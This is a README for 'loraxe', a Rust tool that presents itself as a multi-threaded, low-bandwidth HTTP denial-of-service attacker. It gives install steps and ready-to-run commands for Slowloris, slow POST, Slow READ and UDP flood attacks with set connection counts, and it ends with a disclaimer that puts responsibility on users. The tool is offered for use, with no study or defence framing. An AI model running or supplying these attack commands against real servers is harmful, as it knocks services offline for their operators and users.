Home

Awesome

loraxe

Build Status codecov dependency status

loraxe is a multi-threaded, low-bandwidth HTTP DOS tool that handles connections and sockets in parallel. Written with 100% Safe Rust

🎁 Features

🖧 DOS Modes

📦 Installation

The installation of lor-axe is easy if you have cargo installed.

Build from source:

git clone https://github.com/ajmwagar/lor-axe
cd lor-axe
cargo install --path .
loraxe --help

Use cargo:

cargo install loraxe
loraxe --help

💯 Usage

# Start a Slowloris attack on 0.0.0.0:8080 with 200 concurrent connections
loraxe 0.0.0.0 -p 8080 -s 200

# Start a HTTP POST attack on 0.0.0.0:80 with 150 concurrent connections
loraxe 0.0.0.0 --post

# Start a Slow READ attack on 0.0.0.0:80 with 150 concurrent connections and a read buffer of 8 bytes
loraxe 0.0.0.0 --read -b 8

# Start a UDP flood attack on 0.0.0.0 with 150 concurrent connections.
loraxe 0.0.0.0 -f

# Print a help menu
loraxe --help

Disclaimer

Any actions and or activities related to the code provided is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this tool to break the law.